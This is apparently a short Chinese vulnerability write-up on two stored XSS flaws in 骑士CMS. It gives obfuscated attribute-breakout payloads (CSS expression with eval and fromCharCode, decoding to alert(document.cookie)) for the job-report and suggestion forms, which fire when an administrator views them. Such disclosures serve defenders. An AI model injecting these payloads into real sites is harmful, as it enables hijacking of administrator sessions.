骑士CMS存储型XSS两枚专打管理员

1. 首页>招聘信息>职位详情

在页面里面可以看到“举报”

点击举报,输入:
[php]
我要举报这个骗人的职位,这家公司是流氓什么什么什么什么什么" style="a:expre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41)))" a="
[/php]
74
后台管理员进入举报列表页面即中招。
742
2. 每个页面都可以看到“我要建议”的那个图标,点击提交建议:
[php]
意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意" style="a:expre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41)))" a="a
[/php]
743
后台管理员进入建议列表页面即中招。
744

发表评论